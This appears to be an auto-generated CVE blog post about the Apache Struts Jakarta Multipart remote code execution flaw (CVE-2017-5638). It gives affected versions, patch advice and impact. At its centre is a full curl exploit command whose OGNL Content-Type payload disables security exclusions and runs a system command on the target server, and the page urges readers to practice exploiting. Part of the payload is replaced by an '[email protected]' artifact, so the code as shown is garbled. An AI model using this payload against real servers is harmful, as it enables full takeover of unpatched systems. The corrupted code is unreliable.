Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit is triggered by a malformed `Content-Type` HTTP header. An attacker can craft a header containing an OGNL expression. The flawed error handling mechanism within the file upload logic incorrectly interprets this malicious header. Instead of treating it as a simple string, the parser executes the embedded OGNL expression. This occurs because the exception handler passes the improperly parsed header value directly into an OGNL execution call. Consequently, the attacker achieves remote code execution with the same privileges as the Struts application server, allowing them to run arbitrary system commands, exfiltrate data, or gain complete control over the affected system.

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action

How Exploit:

Malicious Content-Type header containing OGNL expression is sent. The parser’s error handling executes the expression. Arbitrary commands run on the server.

Protection from this CVE:

Apply official patch. Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers.

Impact:

Full system compromise. Unauthorized data access. Complete server control.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top